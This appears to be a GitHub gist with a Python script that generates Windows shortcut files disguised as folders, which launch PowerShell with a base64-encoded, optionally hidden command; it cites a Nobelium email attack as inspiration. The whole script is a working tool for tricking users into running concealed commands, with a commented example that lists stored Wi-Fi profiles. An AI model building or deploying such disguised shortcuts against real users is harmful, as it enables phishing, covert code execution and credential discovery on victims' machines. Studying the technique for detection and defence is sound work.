Last active
August 4, 2021 16:02
-
-
Save spicesouls/fe39482ad4d93ad37568a840f4093591 to your computer and use it in GitHub Desktop.
Generates Windows Shortcuts that execute powershell commands while appearing as a folder.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Generates Windows Shortcuts that execute powershell commands while appearing as a folder. | |
| # ( inspired by the technique used here: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ ) | |
| from win32com.client import Dispatch | |
| import codecs, os | |
| COMMAND = "calc.exe" # What you want Powershell to execute | |
| #COMMAND = "netsh wlan show profiles" | |
| BASEPATH = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe' | |
| ICONPATH = '' # Replace with a path to a .ico to use. (Must be a full path) | |
| HIDDEN = False # Set to True to make the powershell window hide itself incase your command takes a while. | |
| def makeshortcut(code): | |
| if HIDDEN: | |
| args = '-windowstyle hidden -enc ' + codecs.encode(codecs.encode(code,'utf-16-le'),'base64').decode('utf-8').replace('\n','') | |
| else: | |
| args = '-enc ' + codecs.encode(codecs.encode(code,'utf-16-le'),'base64').decode('utf-8').replace('\n','') # Bloody powershell and it's weird encoding | |
| shell = Dispatch('WScript.Shell') | |
| shortcut = shell.CreateShortCut('EvilShortcut.lnk') # Feel free to change the name, but you can just rename it manually later | |
| shortcut.Targetpath = BASEPATH | |
| shortcut.Arguments = args | |
| shortcut.IconLocation = ICONPATH | |
| shortcut.save() | |
| makeshortcut(COMMAND) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment